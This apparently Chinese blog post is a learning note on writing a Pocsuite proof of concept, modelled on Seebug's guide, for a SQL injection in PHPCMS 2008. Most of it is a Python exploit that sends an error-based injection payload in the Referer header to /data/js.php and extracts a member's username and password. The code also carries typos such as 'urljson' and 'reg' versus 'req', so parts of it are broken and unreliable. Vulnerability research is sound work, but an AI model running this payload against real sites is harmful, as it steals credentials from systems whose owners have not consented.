在这里,首先向安全圈最大的娱乐公司,某404致敬。

  参考博文 https://www.seebug.org/help/dev 向seebug平台及该文原作者致敬,虽然并不知道是谁

  长话短说其实,可自由发挥的部分并不多,以原博文中的SQL注入的例子(web应用漏洞)来记录自己的学习心得笔记。

  感觉整篇POC能自己发挥的并不多,从代码上看,几乎90%的代码照要求填写即可,自由发挥的部分,基本就是构造URL payload,发包匹配回显。嗯,就酱。

  镣铐起舞更美是不,哎,其他的照抄吧,自由发挥的部分主要在于漏洞研究,不在于开发代码部分。抽时间还是要写一写的,想要个自己的站点balabala

 #!/usr/bin/env python

 # -*- coding:utf-8 -*-

 #import system lib files

 import os#并没有用啊,我只是很喜欢这个库的名字,觉得很好看

 import re

 import sys#并没有用啊,我还是很喜欢这个库的名字,觉得很好看

 import json#并没有用啊,我还是很喜欢这个库的名字,觉得很好看

 import urlparse

 #import pocsuite lib file下面是要用到的pocsuite框架的一些函数或者类

 from pocsuite.net import reg

 from pocsuite.poc import POCBase

 from pocsuite.utils import register

 class mytest_poc(POCBase):

     vulID = ''     #漏洞编号-ssvid

     version = 1           #poc version

     author = ["no.1 author","no.2 author",...] #author name list

     vulDate = '2011-11-21'  #vul discory(report) date

     createDate = '2015-09-23' #poc create date

     updateDate = '2015-09-23' #poc update date

     referercens = ["http://www.seebug.org/vuldb/ssvid-62274"] #参考文献

     name = '_62274_phpcms_2008_place_sql_inj_PoC' #poc script name

     appPowerLink = 'http://www.phpcms.cn' #app vendor link

     appName = 'PHPCMS'

     appVersion = ''

     vulType = 'SQL Injection' # 漏洞类型

     desc = """balabala""" #描述

     samples = ['http://10.1.200.28/']

     def _attack(self):

         result = {}

         vulurl = urlparse.urljson(self.url, '/data/js.php?id=1')

         payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(char(45,45),username,char(45,45,45),password,char(45,45)) from phpcms_member limit 1))a from information_schema.tables group by a)b), '0')#"

         head = {

             'Referer': payload

         }

         resp = reg.get(vulurl,headers=head)

         if resp.status_code == 200:

             match_result = re.search(r'Duplicate entry \'1--(.+)---(.+)--\' for key', resp.content, re.I | re.M)

             if match_result:

                 result['AdminInfo'] = {}

                 result['AdminInfo']['Username'] = match_result.group(1)

                 result['AdminInfo']['Password'] = match_result.group(2)

         return self.parse_attack(result)

     def _verify(self):

         result = {}

         vulurl = urlparse.urljoin(self.url, '/data/js.php?id=1')

         payload = "1', (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2), md5(1))a from information_schema.tables group by a)b), '0')#"

         head = {

             'Referer': payload

         }

         resp = req.get(vulurl, headers=head)

         if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content:

             result['VerifyInfo'] = {}

             result['VerifyInfo']['URL'] = vulurl

             result['VerifyInfo']['Payload'] = payload

         return self.parse_attack(result)

     def parse_attack(self, result):

         output = Output(self)

         if result:

             output.success(result)

         else:

             output.fail('Internet nothing returned')

         return output

 register(mytest_poc)

  

学习POC框架pocsuite--编写hellowordPOC的更多相关文章

  1. 深入学习微框架:Spring Boot(转)

    转:http://www.infoq.com/cn/articles/microframeworks1-spring-boot/ 相关参考: https://spring.io/guides/gs/s ...

  2. 从Theano到Lasagne:基于Python的深度学习的框架和库

    从Theano到Lasagne:基于Python的深度学习的框架和库 摘要:最近,深度神经网络以“Deep Dreams”形式在网站中如雨后春笋般出现,或是像谷歌研究原创论文中描述的那样:Incept ...

  3. 深入浅出学习Hibernate框架(一):从实例入手初识Hibernate框架

    这篇博客是hibernate学习的第一篇,主要简介hibernate框架,之后简单说一下hibernate的文件夹结构,最后写一个简单的hibernate实例.通过这三步来简单的认识一下hiberna ...

  4. 学习测试框架Mocha

    学习测试框架Mocha 注意:是参考阮老师的文章来学的.虽然阮老师有讲解,但是觉得自己敲一遍,然后记录一遍效果会更好点.俗话说,好记性不如烂笔头. Mocha 是javascript测试框架之一,可以 ...

  5. 深入浅出学习Hibernate框架(二):JDBC基础操作

    上篇博客<深入浅出学习Hibernate框架(一):从实例入手初识Hibernate框架>简单介绍了一下Hibernate框架,并且举了一个实例来了解Hibernate.这篇博客将介绍JD ...

  6. 深度学习Keras框架笔记之TimeDistributedDense类

    深度学习Keras框架笔记之TimeDistributedDense类使用方法笔记 例: keras.layers.core.TimeDistributedDense(output_dim,init= ...

  7. 深度学习Keras框架笔记之Dense类(标准的一维全连接层)

    深度学习Keras框架笔记之Dense类(标准的一维全连接层) 例: keras.layers.core.Dense(output_dim,init='glorot_uniform', activat ...

  8. 【课程学习】课程2:十行代码高效完成深度学习POC

    本文用户记录黄埔学院学习的心得,并补充一些内容. 课程2:十行代码高效完成深度学习POC,主讲人为百度深度学习技术平台部:陈泽裕老师. 因为我是CV方向的,所以内容会往CV方向调整一下,有所筛检. 课 ...

  9. 学习mybatis框架>从零开始学JAVA

    目录 学习mybatis框架 mybatis框架的介绍 什么是mybatis框架 为什么要使用mybatis框架 mybatis的优点 Mybatis框架环境搭建 去官网下载jar包 创建一个普通的j ...

随机推荐

  1. MySQL 性能优化的最佳 20+ 条经验

    今天,数据库的操作越来越成为整个应用的性能瓶颈了,这点对于Web应用尤其明显.关于数据库的性能,这并不只是DBA才需要担心的事,而这更是我 们程序员需要去关注的事情.当我们去设计数据库表结构,对操作数 ...

  2. mysql查看表结构

    SELECT COLUMN_NAME,DATA_TYPE,COLUMN_COMMENT from information_schema.COLUMNS where TABLE_SCHEMA='ceco ...

  3. js学习笔记31----工厂方式

    工厂方式构造对象: 1.原料---构造函数,创建一个对象 “构造函数”,就是专门用来生成“对象”的函数.它提供模板,作为对象的基本结构.一个构造函数,可以生成多个对象,这些对象都有相同的结构.   2 ...

  4. js学习笔记19----getElementsByClassName函数封装

    js里面的getElementsByClassName()方法可通过某个class名获取到元素,在标准浏览器下可使用,在非标准浏览器下不可用.为了能够让这个方法兼容所有的浏览器,可以封装成如下函数: ...

  5. php连接mssql pdo

    怀疑mssql的默认编码...应该不是utf8吧??? <?php $cnx = new PDO("odbc:Driver={SQL Server};Server=XEJMZWMDIX ...

  6. 【MySQL】字符串截取之substring_index

    substring_index(str,delim,count)       str:要处理的字符串       delim:分隔符       count:计数 例子:str=www.baidu.c ...

  7. vector push_back报错

    场景:定义了一个结构体,包含一个vector的成员变量,在给这个vTQ push_back数据的时候报错. typedef struct tag_TQInfo { int iTime; int iMa ...

  8. (转)SDL 1.2 to 2.0 Migration Guide--SDL1.2更新到SDL2.0指南

    SDL 1.2 to 2.0 Migration Guide 目录 SDL 1.2 to 2.0 Migration Guide Translations Introduction Overview ...

  9. linux -- #!/bin/bash

    #!/bin/bash是指此脚本使用/bin/bash来解释执行. 其中,#!是一个特殊的表示符,其后,跟着解释此脚本的shell路径. bash只是shell的一种,还有很多其它shell,如:sh ...

  10. ubuntu 访问 共享 windows文件夹

    sudo mount -o username=*******,password=******** //192.168.1.105/迅雷下载 /mnt/